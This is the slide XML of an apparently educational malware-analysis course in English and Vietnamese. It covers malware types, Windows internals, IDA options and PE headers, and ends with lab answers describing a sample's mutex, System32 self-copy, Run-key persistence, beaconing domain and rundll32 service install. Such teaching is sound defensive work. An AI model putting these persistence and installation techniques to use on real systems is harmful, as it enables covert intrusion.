                <a:hlinkClick r:id="rId17">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" baseline="30000" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId18">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>[2]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> Backdoors are often used for securing remote access to a computer, or obtaining access to </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-171450" lvl="0" marL="171450" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Spyware</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> is software that aims to gather information about a person or organization, sometimes without their knowledge, that may send such information to another entity without the consumer's consent, that asserts control over a device without the consumer's knowledge, or it may send such information to another entity with the consumer's consent, through cookies .</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" baseline="30000" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId19">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId20">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>plaintext</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId21">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>cryptographic systems</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Google Shape;156;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9" name="Google Shape;1009;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8" name="Google Shape;1018;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6" name="Google Shape;1026;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4" name="Google Shape;1034;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2" name="Google Shape;1042;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p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p1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7" name="Google Shape;1057;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4" name="Google Shape;1064;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1" name="Google Shape;1071;p1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GB" sz="1200"/>
              <a:t>LPINT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> (*ptr) [50]: a pointer to an array of 50 long int values.</a:t>
            </a:r>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int *(*ptr)[50]: a pointer to an array of pointers of 50 int values </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Calibri"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>int (*ptr[2])[5]: a array of 2 pointers, each pointer to an array of 5 int values.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072" name="Google Shape;1072;p1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1" name="Google Shape;1081;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9" name="Google Shape;1089;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8" name="Google Shape;1098;p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LPCSTR 32-bit pointer to a constant null-terminated string of 8-bit Windows (ANSI)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>LPCWSTR 32-bit pointer to a constant string of 16-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>Unicode characters</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099" name="Google Shape;1099;p1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5" name="Google Shape;1105;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1" name="Google Shape;1111;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p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7" name="Google Shape;1117;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3" name="Google Shape;1123;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0" name="Google Shape;1130;p1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Thanh ghi được chia 5 khóa gốc: root key (HKEY) trong đó chứa nhiều khóa con (subkey)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Khóa (key): là một thư mục trong thanh ghi chứa các thư mục con hoặc các giá trị</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Mục (value entry): chứa cặp [tên, giá trị]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Giá trị (dữ liệu): chứa trong mục</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1131" name="Google Shape;1131;p1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p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9" name="Google Shape;1139;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p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6" name="Google Shape;1146;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p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3" name="Google Shape;1153;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p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0" name="Google Shape;1160;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p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7" name="Google Shape;1167;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p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4" name="Google Shape;1174;p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2" name="Google Shape;1182;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9" name="Google Shape;1189;p1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0" name="Google Shape;1190;p1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p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6" name="Google Shape;1196;p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p1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2" name="Google Shape;1202;p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p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1" name="Google Shape;1211;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9" name="Google Shape;1219;p1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0" name="Google Shape;1220;p1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p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6" name="Google Shape;1226;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p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2" name="Google Shape;1232;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9" name="Google Shape;1239;p1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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Threads are independent sequences of instructions that are executed by the CPU without waiting for other threads.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>A process contains one or more threads, which execute part of the code within a process.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Threads within a process all share the same memory space, but each has its own processor registers and stack.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>When one thread is running, it has complete control of the CPU, or the CPU core, and other threads cannot affect the state of the CPU or core.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="1" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Before an OS switches between threads, all values in the CPU are saved in a structure called the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB"/>
              <a:t>thread context</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1240" name="Google Shape;1240;p1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7" name="Google Shape;1247;p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4" name="Google Shape;1254;p1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5" name="Google Shape;1255;p1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1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1" name="Google Shape;1261;p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p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7" name="Google Shape;1267;p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6" name="Google Shape;1276;p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p1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2" name="Google Shape;1282;p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p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9" name="Google Shape;1289;p1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0" name="Google Shape;1290;p1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p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6" name="Google Shape;1296;p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1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4" name="Google Shape;1304;p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p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2" name="Google Shape;1312;p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p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9" name="Google Shape;1319;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p1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5" name="Google Shape;1325;p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p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1" name="Google Shape;1331;p1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2" name="Google Shape;1332;p1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p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8" name="Google Shape;1338;p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p1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4" name="Google Shape;1344;p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p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0" name="Google Shape;1350;p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p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6" name="Google Shape;1356;p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p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2" name="Google Shape;1362;p1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3" name="Google Shape;1363;p1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p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1" name="Google Shape;1371;p1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Option – General – Line Prefix – No. of Opcode bytes = 6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Option – General – Auto comments</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>R - function returns to the caller</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>        F - far function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>        L - library function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>        S - static function</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>        B - BP based frame. IDA will automatically convert</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>            all frame pointer [BP+xxx] operands to stack</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>            variables.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>        T - function has type information</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>        = - Frame pointer is equal to the initial stack pointer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>            In this case the frame pointer points to the bottom of the frame</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>        M - reserved</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>        S - reserved</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>        I - reserved</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>        C - reserved</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>        D - reserved</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>        V - reserved</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1372" name="Google Shape;1372;p1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p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9" name="Google Shape;1379;p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p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6" name="Google Shape;1386;p1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7" name="Google Shape;1387;p1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p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5" name="Google Shape;1395;p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p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4" name="Google Shape;1404;p1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5" name="Google Shape;1405;p1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p1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2" name="Google Shape;1412;p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p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9" name="Google Shape;1419;p1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0" name="Google Shape;1420;p1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p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8" name="Google Shape;1428;p1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9" name="Google Shape;1429;p1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1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Signature </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>is a DWORD(4 bytes) containing the value 50h, 45h, 00h, 00h (“PE” followed by two terminating zeroes).</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>FileHeader </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(IMAGE_FILE_HEADER) is the next 20 bytes of the PE file and contains info about the physical layout &amp; properties of the file e.g. number of sections.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB"/>
            </a:br>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>OptionalHeader </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>(IMAGE_OPTIONAL_HEADERS) is always present and forms the next 224 bytes. It contains info about the logical layout inside the PE file with fields like AddressOfEntryPoint, ImageBase, FileAlignment, SectionAlignment etc. The last 128 bytes contains the Data Directory which is an array of 16 IMAGE_DATA_DIRECTORY structures.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Google Shape;222;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Header:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Machine: i386,486,586 (0x14c)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;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83c21d49acae2dea242d1b687cf3061b</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="Google Shape;350;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Google Shape;416;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p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 name="Google Shape;549;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3" name="Google Shape;613;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p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1" name="Google Shape;621;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8" name="Google Shape;628;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1. The malware appears to be packed. The only import is ExitProcess,</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although the strings appear to be mostly clear and not obfuscated.</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2. The malware creates a mutex named WinVMX32, copies itself into </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>C:\</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Windows\ System32\vmx32to64.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>. and installs itself to run on system</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startup by creating the registry key HKLM\SOFTWARE\Microsoft\Windows\</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CurrentVersion\Run\VideoDriver set to the copy location.</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3. The malware beacons a consistently sized 256-byte packet containing</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seemingly random data after resolving </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>www.practicalmalwareanalysis.com</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="629" name="Google Shape;629;p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Google Shape;635;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1. To install the malware as a service, run the malware’s exported installA</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function via </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>rundll32.exe </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="en-GB" sz="1200" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
